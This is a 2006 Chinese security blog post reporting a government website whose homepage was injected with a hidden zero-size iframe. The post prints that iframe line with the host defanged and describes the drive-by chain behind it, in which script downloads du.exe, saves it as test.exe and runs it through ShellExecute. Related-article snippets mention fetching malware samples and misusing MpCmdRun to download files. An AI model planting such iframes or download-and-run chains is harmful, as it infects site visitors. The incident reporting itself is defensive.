又一个下载恶意文件的政府网站

最新推荐文章于 2024-04-03 07:57:25 发布
最新推荐文章于 2024-04-03 07:57:25 发布
阅读量3.3k 收藏
点赞数
分类专栏: 系统安全 系统维护 原创作品 文章标签: javascript iframe 脚本 ie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1106958
版权

endurer 原创

2006-08-22 第1版 

首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3  加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul

紫郢剑侠
关注
专栏目录
Pcap数据包资源下载汇总-恶意威胁流量
村中少年的专栏
01-20 3668
介绍一些恶意威胁流量pcap数据包的资源
恶意样本下载
catgray的博客
08-28 3534
import requests import json #GET /file/81b69bf08aa50ff8896c11bb289f3656ac1df8ba3bba7a5444fa1ef97c9d14b5.7z HTTP/1.1 headers = { "Host": "www.virusign.com", "Connection": "keep-alive", "Cache-Control":...
pikachu之不安全的文件下载概述
qq_42728977的博客
12-26 1065
不安全的文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 此时如果 攻击者提交的不...
两个会自动下载恶意程序文件政府网站
Purpleendurer@CSDN
08-18 4215
endurer 原创2006-08-18 第1版打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:--------<TR><script language=javascript src=bbs.js></script><TD vAlign=top align=
恶意下载文件
最新发布
m0_62207482的博客
04-03 390
说人话就是,浏览器并不认得这是什么类型,也不知道应该如何展示,只知道这是一种二进制文件,因此遇到content-type为application/octet-stream的文件时,浏览器会直接把它下载下来。意思是未知的应用程序文件,浏览器一般不会自动执行或询问执行。在某些下载文件的场景中,服务端可能会返回文件流,并在返回头中带上Content-Type:application/octet-stream,告知浏览器这是一个字节流,浏览器处理字节流的默认方式就是下载
MpCmdRun恶意文件下载
Fly_鹏程万里
09-29 2764
文章前言 Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~ 具体实现
政府网站模板下载,免费政府网站源码下载政府机关网站模板管理系统
11-30
政府网站模板下载与免费政府网站源码是网页设计与开发中的一个重要领域,尤其在信息化建设日益普及的今天,政府机关的在线形象对于公众服务、信息传递以及政务公开至关重要。政府网站模板管理系统则扮演了简化这一...
国微CMS政府网站系统
08-16
作为一个内容管理系统,它提供了丰富的模板选择和强大的自定义功能,使得用户可以根据自身需求定制出独特的网站风格。此外,它的模块化设计允许用户轻松添加或移除各种功能,如新闻发布、在线留言、文档管理等,大大...
千博政府网站群管理系统 v2017 Build0929
11-28
2. **GoogleSiteMap.aspx、BaiduSiteMap.aspx**:这两个文件分别对应谷歌和百度的站点地图,有助于搜索引擎优化(SEO),提升政府网站在搜索引擎中的可见性。 3. **Property.aspx**:可能是网站属性设置或配置页面,...
宁志地方政府网站管理系统 v7.6.8 新宽频版
11-30
这个系统以其大红色调的宽屏界面为特点,既显得庄重又不失现代感,是地方政府构建官方网站的理想选择。作为国内知名的建站软件,宁志网站管理系统由专业的技术团队精心研发,旨在提供一种即开即用、易于管理和维护的...
Pikachu靶场——不安全的文件下载(Unsafe Filedownload)
来日可期的博客
10-04 1353
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载文件名称,后台在收到请求后会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼接到下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。
两个下载恶意程序文件政府网站换花样了
Purpleendurer@CSDN
08-22 3099
endurer 原创2006-08-22 第1版今天又看了看 两个会自动下载恶意程序文件政府网站 一文中的两个网站,发现换了花样。两个网站首页末均被加入:/---------<iframe src="hxxp://www.wzx***qy.com/" width="0" height="0" frameborder="no" border="0" marginwidth="0"
pikachu靶场-7 不安全的文件下载和上传
weixin_52180702的博客
12-13 1078
很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能会导致攻击者可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载
进程异常行为-访问恶意下载源 解决方案_安全行为分析对devops的好处
weixin_39902870的博客
11-24 147
云本地架构、持续集成和持续交付(CI/CD)、devops和站点可靠性工程(SRE)等技术和实践使组织能够创新并加速软件产品的交付。但是,它们也扰乱了传统的软件开发和维护生命周期(SDLC),并显著地改变了企业需要做什么才能成功地保护应用程序和业务服务。为了帮助组织确保应用程序的安全交付,TrueFort开发了一种保护和监控云工作负载的方法,称为应用程序安全行为分析(ASBA)。ASBA...
进程异常行为-访问恶意下载源 解决方案_不要忽略服务器上的异常进程
weixin_39889544的博客
11-24 286
在之前的文章中,我们看到了ADAudit Plus的用户行为分析(UBA)功能如何使管理员能够监视用户登录活动以识别受感染的帐户。ADAudit Plus中的UBA还可以帮助您跟踪成员服务器上的任何异常进程,以防御外部威胁。在此文章中,我们将研究企业如何跟踪成员服务器上的进程活动。跟踪主机上的异常进程 想象一下这样一种情况:员工点击恶意链接并下载恶意软件,该恶意软件会在网络中传播恶意数据并进行加密...
多线程下载恶意样本
Keo的博客
05-07 746
最近在做威胁情报库,写了个脚本搜集恶意样本,需要在malshare上注册账号(免费)。 virustotal虽然是高级会员,但是用不了feed api,可恶啊,不知道为什么,有没有懂的老哥 # 05/07/2021 Modified by Keo <Thisiskkya@gmail.com> # Download Malware Samples daily with muti threads # Thanks for Jun Xie <jxie2004@gmail.com> for
免费恶意样本资源
debugeeker的专栏
10-13 3698
恶意软件研究员经常要寻找恶意样本来获取威胁情报和开发防御方案。 下面是一些免费的恶意样本资源站,研究的人请下载到虚拟机上玩,后果自负! ANY.RUN https://app.any.run/submissions/ 每天更新,需要注册 Contagio Malware Dump http://contagiodump.blogspot.com/ 每天更新,下载后解压需要发邮件给博主获取密码 DAS MALWERK https://dasmalwerk.eu/ 更新频率不知,随便下载
恶意数据包(pcap)下载网站合集
PP_zi的博客
08-25 4553
收集一些恶意数据包下载网站,方便研究学习。
文件操作漏洞之任意文件下载(七)
guanjian_ci的博客
02-21 368
漏洞介绍: 很多网站由于业务需求,往往需要提供文件(附件)下载的功能块,但是如果对下载文件没有做限制,直接通过绝对路径对其文件进行下载,那么,恶意用户就可以利用这种方式下载服务器的敏感文件,对服务器进行进一步的威胁和攻击。 漏洞存在的地方: 系统中存在文件(附件/文档/图片等等资源)下载的地方。 漏洞的危害: 通过任意文件下载,可以下载服务器的任意文件,web业务的代码,服务器和系统的具体配置信息,也可以下载数据库的配置信息,以及对内网的信息探测等等 案例分析: 漏洞标题:xxx管理平台任
恶意PDF文档检测技术现状与发展趋势
恶意PDF文档检测技术是信息安全领域的热点之一,其发展对于保障政府、企业和个人的信息安全至关重要。随着技术的不断进步,我们有理由相信,未来的恶意PDF检测将更加精准和高效,能够更好地抵御各种恶意PDF带来的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值